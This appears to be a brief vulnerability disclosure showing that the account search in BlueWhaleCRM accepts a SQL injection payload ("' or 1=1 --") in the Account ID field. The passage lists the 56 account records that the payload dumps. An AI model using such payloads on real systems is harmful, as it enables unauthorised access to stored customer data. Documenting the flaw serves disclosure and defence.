

Logged in to BlueWhaleCRM  
Go to Search -> Accounts

Account ID:	<input type="text" value="@#%' or 1=1 --"/>	Name:	<input type="text"/>	Phone:	
City:	<input type="text"/>	State:	<input type="text" value="All"/>	<input type="button" value="Search"/>	

And when we click on Search button, this is what it results in:

**56 Account(s) Found**

Phone	Fax	City	State	Status	Account Type
(555) 778-9900	555 7769876	New Haven	CT	Current	Customer
5553332345	5558673498	Manhattan	KY	IMPORT	IMPORT
5550975673	5559878651	Lansing	AZ	Current	Customer
5557654321	5555876557	Dallas	NV	IMPORT	IMPORT
5558762413	5553134567	Green Bay	ND	Current	Vendor
5551237654	5559873456	Springfield	CO	IMPORT	IMPORT
5559878651	5551238765	San Diego	TN	Current	Internal
5557173455	5557643123	Charleston	MN	Suspended	Customer
5557463098	5557463098	Mobile	MS	Inactive	Vendor
5551238765	5559872345	Temple Terrace	CT	IMPORT	IMPORT
5552342222	5558987023	Butte	HI	IMPORT	IMPORT
5556786789	5557645678	Charlotte	MI	Current	Internal
5554325432	5558182345	Portland	LA	Suspended	Customer
5557643123	5557173455	Orlando	MO	IMPORT	IMPORT
5559878651	5550975673	Buffalo	VA	On Hold	Customer

Thus BlueWhaleCRM is vulnerable to SQL Injection attack